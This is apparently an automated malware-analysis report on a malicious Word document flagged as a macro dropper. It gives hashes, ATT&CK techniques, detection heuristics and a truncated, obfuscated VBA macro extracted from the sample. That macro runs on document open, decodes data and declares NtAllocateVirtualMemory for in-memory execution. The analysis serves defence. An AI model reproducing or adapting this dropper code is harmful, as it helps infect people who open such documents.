Office (OLE) malware analysis — malicious · 075a45a6dce497ef

MALICIOUS

Office (OLE)

175.5 KB Created: 2017-11-28 14:29:00 Authoring application: Microsoft Office Word First seen: 2017-12-08

MD5: 4d8dce57ddd480537a8b330c6984f05c SHA-1: 4b0a407fda05b6e58de3a762e759bbeac5540d4f SHA-256: 075a45a6dce497ef689c3211ebc3e84f9de6fd1027ec80c7653cc60fcc1d3275

142 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute automatically. Heuristics indicate a lure to enable macros, a common tactic for malware droppers. The VBA script, though obfuscated, likely attempts to download and execute a second-stage payload, as suggested by the 'Doc.Dropper.Agent' ClamAV detection name.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6385933-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6385933-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10840 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10840 bytes
SHA-256: `c01e144612bb115c625d7ecf0080ce1edb4123be9c147b9a1709cb58ec7df868`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub painfree() hobsons.monopolist.Value = Day(#12/5/2013#) Set airbus = hobsons.monopolist.SelectedItem coalfield = 25 + 47 Pmt 0, coalfield, 10088, 35223, 6 motives = airbus.Name aecium = 80 - 53 + 7817 nihilo = Right(motives, aecium) chytridiaceae = gleek(nihilo) belting = 42 + 27 Pmt 0, belting, 34321, 58592, 2 #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim scorpionida As LongPtr Dim authenticate As LongPtr Dim fertilizer As LongPtr Dim parlous As LongPtr Dim naturally As LongPtr crossopterygian = 16 - 12 + 2060 #ElseIf (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim authenticate As Long Dim scorpionida As Long Dim fertilizer As Long arefaction = 42 - 41 + 780 Dim parlous As Long Dim naturally As Long crossopterygian = arefaction + 3459 #End If justly = 11 + 52 Pmt 0, justly, 23115, 37695, 7 metaphysician = 26 + 37 Pmt 0, metaphysician, 13368, 15107, 6 gosainthan = chytridiaceae scorpionida = batrachomyomachia(gosainthan) Dim fetichism As String Dim waw As String fertilizer = 53 - 102 + 49 authenticate = scorpionida + crossopterygian parlous = 55 - 123 + 201595 naturally = 105 - 88 + 3483 bhang = ordinary(parlous, _ fertilizer, authenticate, _ fertilizer, fertilizer, _ fertilizer, fertilizer) acceleration = 56 + 15 Pmt 0, acceleration, 24455, 34039, 3 End Sub Private Sub Document_Open() shush = mariposa carryover = repentant painfree epicarpal = 43 + 51 Pmt 0, epicarpal, 10657, 56315, 2 End Sub Attribute VB_Name = "nganasan" #If (95 - 52 + 357 + 5 - 105 + 400) > ((91 - 85 + 314) - (61 - 53 + 532) * 1) And (21 - 7 * 3) * 2 < (Win64) Then Public Declare _ PtrSafe Function framed Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (lowrise As LongPtr, obolus As LongPtr, ByVal stowaway As LongPtr, secundumByVal As LongPtr, irreprovable As LongPtr, ByVal tinsel As LongPtr) As LongPtr #ElseIf (95 - 52 + 357 + 5 - 105 + 400) > ((91 - 85 + 314) - (61 - 53 + 532) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then #End If Function gleek(blandness) As String Dim hydroplane As Long Dim anthelion As Long Dim clothesline As Long Dim deserving(6962) As Byte Dim eyepiece As Long Dim rocket(63) As Long Dim immigrant() As Byte Dim cleancut(63) As Long Dim epistle(63) As Long mediocritas = 47 - 17 + 225 prestigitator = 23 - 38 + 79 dimmed = 57 - 116 + 65595 chronogrammatical = 34 - 127 + 65373 organography = 104 - 26 + 262066 apart = 78 - 30 + 208 hoop = 107 - 45 + 4034 grubbing = 74 - 86 + 16711692 ' = 78-49-29 Dim aphorist() As Byte aphorist = VBA.StrConv(blandness, 128) general = 38 + 27 Pmt 0, general, 29643, 49257, 2 chemistry = 7840 + 3 abrachia = vbKeyShift - 12 For olfaction = (3 - 3) To chemistry If olfaction Mod 2 = (4 - 4) Then aphorist(olfaction) = aphorist(olfaction) - abrachia Else aphorist(olfaction) = aphorist(olfaction) - (abrachia - 1) End If Next olfaction aurora = 20 + 9 Pmt 0, aurora, 2245, 31144, 6 acroanesthesia = salmonella For clothesline = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) cleancut(clothesline) = hindgut(clothesline, prestigitator, 45) epistle(clothesline) = hindgut(clothesline, hoop, 45) rocket(clothesline) = hindgut(clothesline, organography, 45) Next clothesline heronry = 34 + 23 Pmt 0, heronry, 7329, 17110, 8 immigrant = aphorist fencer = 5 + 47 Pmt 0, fencer, 4583, 52992, 4 gerontic = 128 - 112 - 13 sanicle = 15 - 100 + 87 For eyepiece = (2 - 2) To chemistry affuse = immigrant(eyepiece) sled = immigrant(eyepiece + 2) mauritanian = epistle(acroanesthesia(immigrant(eyepiece + 1))) exoneration = cleancut(acroanesthesia(sled)) + acroanesthesia(immigrant(eyepiece + gerontic)) hydroplane = rocket(acroanesthesia(affuse)) + mauritanian + exoneration cloth ... (truncated)

SHA-256: c01e144612bb115c625d7ecf0080ce1edb4123be9c147b9a1709cb58ec7df868

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Sub painfree()
hobsons.monopolist.Value = Day(#12/5/2013#)
Set airbus = hobsons.monopolist.SelectedItem
coalfield = 25 + 47
Pmt 0, coalfield, 10088, 35223, 6
motives = airbus.Name
aecium = 80 - 53 + 7817
nihilo = Right(motives, aecium)
chytridiaceae = gleek(nihilo)
belting = 42 + 27
Pmt 0, belting, 34321, 58592, 2
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim scorpionida As LongPtr
Dim authenticate As LongPtr
Dim fertilizer As LongPtr
Dim parlous As LongPtr
Dim naturally As LongPtr
crossopterygian = 16 - 12 + 2060
#ElseIf (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim authenticate As Long
Dim scorpionida As Long
Dim fertilizer As Long
arefaction = 42 - 41 + 780
Dim parlous As Long
Dim naturally As Long
crossopterygian = arefaction + 3459
#End If
justly = 11 + 52
Pmt 0, justly, 23115, 37695, 7
metaphysician = 26 + 37
Pmt 0, metaphysician, 13368, 15107, 6
gosainthan = chytridiaceae
scorpionida = batrachomyomachia(gosainthan)
Dim fetichism As String
Dim waw As String
fertilizer = 53 - 102 + 49
authenticate = scorpionida + crossopterygian
parlous = 55 - 123 + 201595
naturally = 105 - 88 + 3483
bhang = ordinary(parlous, _
fertilizer, authenticate, _
fertilizer, fertilizer, _
fertilizer, fertilizer)
acceleration = 56 + 15
 Pmt 0, acceleration, 24455, 34039, 3

End Sub



Private Sub Document_Open()
shush = mariposa
carryover = repentant
painfree
epicarpal = 43 + 51
 Pmt 0, epicarpal, 10657, 56315, 2
End Sub

Attribute VB_Name = "nganasan"
#If (95 - 52 + 357 + 5 - 105 + 400) > ((91 - 85 + 314) - (61 - 53 + 532) * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Public Declare _
PtrSafe Function framed Lib "ntdll  " Alias _
"NtAllocateVirtualMemory" (lowrise As LongPtr, obolus As LongPtr, ByVal stowaway As LongPtr, secundumByVal As LongPtr, irreprovable As LongPtr, ByVal tinsel As LongPtr) As LongPtr
#ElseIf (95 - 52 + 357 + 5 - 105 + 400) > ((91 - 85 + 314) - (61 - 53 + 532) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then

#End If



Function gleek(blandness) As String
Dim hydroplane As Long
Dim anthelion As Long
Dim clothesline As Long
Dim deserving(6962) As Byte
Dim eyepiece As Long
Dim rocket(63) As Long
Dim immigrant() As Byte
Dim cleancut(63) As Long
Dim epistle(63) As Long
mediocritas = 47 - 17 + 225
prestigitator = 23 - 38 + 79
dimmed = 57 - 116 + 65595
chronogrammatical = 34 - 127 + 65373
organography = 104 - 26 + 262066
apart = 78 - 30 + 208
hoop = 107 - 45 + 4034
grubbing = 74 - 86 + 16711692

' = 78-49-29
Dim aphorist() As Byte
aphorist = VBA.StrConv(blandness, 128)
general = 38 + 27
Pmt 0, general, 29643, 49257, 2
chemistry = 7840 + 3
abrachia = vbKeyShift - 12
For olfaction = (3 - 3) To chemistry
If olfaction Mod 2 = (4 - 4) Then
aphorist(olfaction) = aphorist(olfaction) - abrachia
Else
aphorist(olfaction) = aphorist(olfaction) - (abrachia - 1)
End If
Next olfaction
aurora = 20 + 9
Pmt 0, aurora, 2245, 31144, 6
acroanesthesia = salmonella
For clothesline = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
cleancut(clothesline) = hindgut(clothesline, prestigitator, 45)
epistle(clothesline) = hindgut(clothesline, hoop, 45)
rocket(clothesline) = hindgut(clothesline, organography, 45)
Next clothesline
heronry = 34 + 23
Pmt 0, heronry, 7329, 17110, 8
immigrant = aphorist
fencer = 5 + 47
Pmt 0, fencer, 4583, 52992, 4
gerontic = 128 - 112 - 13
sanicle = 15 - 100 + 87
For eyepiece = (2 - 2) To chemistry
affuse = immigrant(eyepiece)
sled = immigrant(eyepiece + 2)
mauritanian = epistle(acroanesthesia(immigrant(eyepiece + 1)))
exoneration = cleancut(acroanesthesia(sled)) + acroanesthesia(immigrant(eyepiece + gerontic))
hydroplane = rocket(acroanesthesia(affuse)) + mauritanian + exoneration
cloth
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.